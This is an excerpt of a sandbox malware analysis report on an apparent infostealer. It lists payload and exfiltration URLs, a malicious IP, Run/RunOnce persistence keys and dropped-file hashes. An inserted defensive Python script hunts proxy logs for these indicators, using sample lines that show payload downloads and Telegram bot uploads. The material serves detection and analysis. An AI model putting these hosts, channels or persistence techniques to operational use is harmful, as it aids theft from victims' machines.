https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | false | - | high
https://showip.net/?checkip= | BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | false | - | high
http://james.newtonking.com/projects/json | fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot4(SpawnProcess) | BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | false | - | high
https://search.yahoo.com?fr=crmas_sfp | BPL_1000572_007.bat.exe, 0000000D.00000003.451016918.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | false | - | high
http://schema.org | BPL_1000572_007.bat.exe, 0000000D.00000002.579528582.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.449921184.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.452428690.000000000109D000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467298844.000000000109D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.openstreetmap.org/copyright | BPL_1000572_007.bat.exe, 0000000D.00000003.468874553.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000002.579802617.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000003.467326371.00000000010AD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.newtonsoft.com/jsonschema | fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.nuget.org/packages/Newtonsoft.Json.Bson | BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | BPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.dr | false | - | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.252.178.63 | unknown | Germany | 10753 | LVLT-10753US | true
162.55.60.2 | showip.net | United States | 35893 | ACPCA | false
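The URL and IP tables above show why exact-string blocking is fragile for this sample: the strings carved from memory carry trailing junk (for example "...Arwiw_Xnqfdlpv.pngP/r/" and "...inf_Hpgwbzkt.bmp)Acugwsmmzufefycomfxvihl"), the two payload URLs on 185.252.178.63 are marked malicious while Avira URL Cloud rates them safe with unknown reputation, and showip.net and api.telegram.org are legitimate services that the sample merely abuses for an IP lookup and as an exfiltration channel. Added example, not part of the Joe Sandbox report: Python that matches proxy log lines on host (plus a path prefix for the Telegram bot API) rather than on the exact URL, and tiers the legitimate-service indicators so a lone public IP lookup is not escalated on its own. The proxy log format, client addresses, timestamps and the bot-token placeholder are constructed for the example; the hosts and paths are the ones in the report.

```python
from urllib.parse import urlsplit

# Network indicators from the report. Memory-carved URL strings carry trailing junk,
# so matching is by host (and a path prefix for Telegram), never by exact string.
C2_HOSTS = {"185.252.178.63"}             # payload host: /loader/uploads/*.png, *.bmp
IP_CHECK_HOSTS = {"showip.net"}           # legitimate service used to learn the victim's public IP
EXFIL_API = {"api.telegram.org": "/bot"}  # legitimate service abused as exfiltration channel

def classify_url(url):
    """(tier, reason) for one URL: 'high' for the C2 host, 'low' for indicators
    that also occur in legitimate traffic, None when nothing matches."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in C2_HOSTS:
        return ("high", "payload/C2 host")
    if host in IP_CHECK_HOSTS:
        return ("low", "public IP lookup")
    prefix = EXFIL_API.get(host)
    if prefix and parts.path.startswith(prefix):
        return ("low", "Telegram bot API")
    return None

def parse_proxy_line(line):
    """Constructed proxy format (assumption): '<ts> <client_ip> <method> <url> <status>'."""
    ts, client, method, url, status = line.split()
    return {"ts": ts, "client": client, "method": method, "url": url, "status": int(status)}

def hunt(lines):
    """Per client: {client: (tier, sorted reasons)}. Any 'high' hit, or two or more
    distinct 'low' indicators on the same client, escalates the client to 'high'."""
    per_client = {}
    for line in lines:
        rec = parse_proxy_line(line)
        hit = classify_url(rec["url"])
        if hit is None:
            continue
        entry = per_client.setdefault(rec["client"], {"reasons": set(), "tiers": []})
        entry["tiers"].append(hit[0])
        entry["reasons"].add(hit[1])
    result = {}
    for client, e in per_client.items():
        tier = "high" if ("high" in e["tiers"] or len(e["reasons"]) >= 2) else "low"
        result[client] = (tier, sorted(e["reasons"]))
    return result

# Constructed log lines: hosts and paths from the report, clients and timestamps invented.
SAMPLE_PROXY_LOG = [
    "2022-09-23T06:00:01Z 10.0.0.21 GET http://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.png 200",
    "2022-09-23T06:00:02Z 10.0.0.21 GET http://185.252.178.63/loader/uploads/inf_Hpgwbzkt.bmp 200",
    "2022-09-23T06:00:05Z 10.0.0.21 GET http://showip.net/ 200",
    "2022-09-23T06:00:09Z 10.0.0.21 POST https://api.telegram.org/bot<TOKEN>/sendDocument 200",
    "2022-09-23T06:01:00Z 10.0.0.44 GET http://showip.net/?checkip= 200",             # lone IP lookup: weak
    "2022-09-23T06:02:00Z 10.0.0.57 POST https://api.telegram.org/bot<TOKEN>/sendMessage 200",
    "2022-09-23T06:02:30Z 10.0.0.57 GET https://showip.net/ 200",                     # two weak signals escalate
    "2022-09-23T06:03:00Z 10.0.0.90 GET https://www.newtonsoft.com/json 200",         # benign library URL also seen in memory
]

if __name__ == "__main__":
    for client, (tier, reasons) in sorted(hunt(SAMPLE_PROXY_LOG).items()):
        print(f"{client}: {tier} {reasons}")
```

Because classify_url() keys on the parsed host, the junk-suffixed string from the report ("...Arwiw_Xnqfdlpv.pngP/r/") still resolves to the C2 host and is rated high, independent of what a URL reputation feed says about it.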
                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                  Analysis ID:708242
                                                                  Start date and time:2022-09-23 07:58:49 +02:00
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 10m 3s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:light
                                                                  Sample file name:BPL_1000572_007.bat.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:23
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@14/16@1/2
                                                                  EGA Information:Failed
                                                                  HDC Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 99%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                  • TCP Packets have been reduced to 100
                                                                  • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, watson.telemetry.microsoft.com
                                                                  • Execution Graph export aborted for target BPL_1000572_007.bat.exe, PID 5820 because it is empty
                                                                  • Execution Graph export aborted for target pdf.exe, PID 3712 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                  • VT rate limit hit for: BPL_1000572_007.bat.exe
Time     | Type            | Description
08:00:09 | API Interceptor | 42x Sleep call for process: powershell.exe modified
08:01:14 | API Interceptor | 1x Sleep call for process: BPL_1000572_007.bat.exe modified
08:01:14 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pdf "C:\Users\user\AppData\Roaming\note\pdf.exe"
08:01:27 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pdf "C:\Users\user\AppData\Roaming\note\pdf.exe"
08:01:40 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe
08:01:51 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe
08:01:57 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):1.1154523384164892
                                                                  Encrypted:false
                                                                  SSDEEP:192:6dpuNUESHBUZMXyaKAque5Z/u7s/S274ItS:H2pBUZMXya1uZ/u7s/X4ItS
                                                                  MD5:B9286D1795E2E7949C86D891E9ADC2EB
                                                                  SHA1:C72D39D23BC689E9B214E511739566831E3E93A4
                                                                  SHA-256:44B710B262B4D98D9670E8177867E208A462E679B48E4A6439E201087807EBA8
                                                                  SHA-512:B4F4CF12F947AAD82E963399B7538B51F27072284FBEFD539F9F1D8E09EB9995FCB1A2F001B4A46AF9C853271D27464FC9299A6882FE0BECEF3A4264B4FBD145
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.8.4.1.8.9.0.2.3.4.0.3.5.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.8.4.1.8.9.1.3.9.9.6.5.8.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.8.b.5.e.a.d.-.7.d.c.1.-.4.3.7.c.-.b.b.2.b.-.1.3.c.6.b.6.d.7.0.c.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.9.5.a.6.6.f.-.7.5.5.0.-.4.7.0.b.-.b.c.8.4.-.c.5.f.1.5.6.d.6.4.b.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.t.h.d.l.x.o.y.q.v.n.q.s.f.c.f.i.i.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.i.n.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.9.c.-.0.0.0.1.-.0.0.1.a.-.c.3.c.6.-.2.1.5.1.5.d.c.f.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.0.f.8.1.9.f.b.3.8.9.6.7.5.1.d.e.7.c.6.2.d.b.6.a.9.0.e.3.b.2.b.0.0.0.0.0.0.0.0.!.0.0.0.0.c.2.d.0.1.6.e.d.0.1.1.9.4.1.a.8.f.c.8.7.f.3.2.5.f.2.c.1.d.3.7.
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Sep 23 15:01:48 2022, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):240774
                                                                  Entropy (8bit):3.82621578143613
                                                                  Encrypted:false
                                                                  SSDEEP:3072:NN2prvl9gIOgF5hx4lH20glUCgURRpMdco8i5R0yjd+p7l88a:exl9RpDEt29lTjXS5R0fp
                                                                  MD5:46D91CD17431F6B0B4B998A1E8167F4A
                                                                  SHA1:53B6E58CE184904533F98BD2269CB620FD29B03F
                                                                  SHA-256:2152382E54A2D150ADA40B2F94848219EBEC5F8C2220BAB457D7F443AA40B3AC
                                                                  SHA-512:BD922B20E72701E78EAC7D53ACA55D96D2A47D1A63CB988CCF5B975E9AFDEA4ECE84A0C78A0CC6D56F33CAC8141E3398AB5420A9F504BE79DFE70CD02C82772E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:MDMP....... .......\.-c............D...............X.......T....#......D....R..........`.......8...........T...........H6..>v..........l#..........X%...................................................................U...........B.......%......GenuineIntelW...........T...........6.-c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8472
                                                                  Entropy (8bit):3.7005990000293507
                                                                  Encrypted:false
                                                                  SSDEEP:192:Rrl7r3GLNiyq6WtYQgU6Y/961xIKt2gmfZjStCprF89bYbsfaIm:RrlsNin6A6Y1611t2gmf9SvYgf0
                                                                  MD5:1F892ED2A9E7CD005A535EC7D70BAF82
                                                                  SHA1:94FE6AA9C0D1FE54BDA238596F167F5D2A52809A
                                                                  SHA-256:A0CA82DB914D4B2CAB87A6384DBCF61501E30341881AE5E31D8589B6C7F3C78A
                                                                  SHA-512:0839A3A9989C9F8CD2E828AB6001B7ABDFAC8E1BBE425743F756D856E77D648D774530846E6BD15AF2821B0A4C4F015AD990CEC6AABE4665C465804A14E10FFA
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.7.6.<./.P.i.d.>.......
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4800
                                                                  Entropy (8bit):4.483871729451896
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwSD8zsQJgtWI9LjWgc8sqYjo8fm8M4JmnG+sFH+q8vlnG+m8eP+MEaRd:uITfWwSgrsqYRJyaKl+8eWMEaRd
                                                                  MD5:BA7C194447B47A27F80AA67550D581C5
                                                                  SHA1:010D44C3C42AE1CE72BB5E4429919298B46508F2
                                                                  SHA-256:B4726C694507908646E3FD5088F2C0F5F74CBC829B241D168738D89EF676D8AC
                                                                  SHA-512:E86578D004DF381A8FEBCBC0366561088F10F0D6DAA5832468F1F3BA930DB0B28932614CD0A2704746D2777022CE561D49B180A2BCC235E5F258DC0FC2760C9B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1704972" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):1265
                                                                  Entropy (8bit):5.351561006604618
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7UE4KdE4KBLWE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvUHKdHKu
                                                                  MD5:A5954DA14DDC15175BD61315B8EA45C8
                                                                  SHA1:688A976F957D800BEA0CAA5E25CA012C8DF79FAA
                                                                  SHA-256:E90C9FE30AE1F10B8ACB2EE2477FBEED2A53E86923C9C57D8D91C17FFF18C3C0
                                                                  SHA-512:35BAB190EBA159B03EC83F80E46EFCAD178F1BFF03DAC664EF4F69C2F29DF55FD9A035562EEC2B11320F367C569F2FC6A27DC4A57E8A866D3C2FFA601C439FE8
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):5829
                                                                  Entropy (8bit):4.8968676994158
                                                                  Encrypted:false
                                                                  SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                  MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                  SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                  SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                  SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):16444
                                                                  Entropy (8bit):5.536497593210311
                                                                  Encrypted:false
                                                                  SSDEEP:384:Zte/k0wzps6z0wRBpDRncSBxnUjux5iJ9gGSJ3uzp1oYv:Fl0wRBXc4xUSxNGcuZv
                                                                  MD5:B9CF543484D7F3B967C87F3CD9963FB1
                                                                  SHA1:FF26B20011FDE02F11A7708EC2B201E7285B30AE
                                                                  SHA-256:BBEC3C7A0190E0C56B0C3B49A9F7CFDFC02D795D01B7CB2B65D2FD62D4EC9F30
                                                                  SHA-512:390BC80E412F35D67F4382DFE087264690B1C3DBE184E20522CF9D5B288BA9B978CABDE14AC1F95591B99AA3639554B55AB2C02561DD4F3BCB9BCED549594B38
                                                                  Malicious:false
                                                                  Preview:@...e.........................).Y...8.c..............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23040
                                                                  Entropy (8bit):3.787825179149624
                                                                  Encrypted:false
                                                                  SSDEEP:96:xLcrSkBp98Z3Cft8e3/dga6vNIqB8Sxxxxr1yFzuzVzdWzizx0zgz8yuzH+XzvzU:xLcuklhfZlga6KqB8ng7LKPiL+
                                                                  MD5:386FB639720C77FC29E68682D264423F
                                                                  SHA1:C2D016ED011941A8FC87F325F2C1D37D73158ADE
                                                                  SHA-256:3BAEBB36220C28C56A692E59E683C77026DAD821CADC377D0D8452D712CCF7A3
                                                                  SHA-512:9B193DA431FFDF47DD5C075018B0A5683FB05FABC8035D075D54CAE856A7B3A66951A547C166EE0449E4DCF0D57360F106E9ADB51765EBA938323C8EBA4F0F6F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@.+c..............0......J.......-... ........@.. ....................................@..................................,..O....@...H........................................................................... ............... ..H............text...4.... ...................... ..`.rsrc....H...@...H..................@..@.reloc...............X..............@..B.................-......H........!...............................................................(....*..(....*..0..Z.......(....(.......#......*@(........+2...&(.....(....-.(....t....r...p .......o....&..X....i2.*.(....(....*V(....t....r...po....*.0..^....... ....(......&....(....o....o......s......s.... .Zb. ....o....o........,..o......,..o.....&..*...4................(..E........!..O..........IY.......0..........rO..p(....(......-..*.o....*.0..8.......(....r...po.....s.......+......i]....a.o....
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
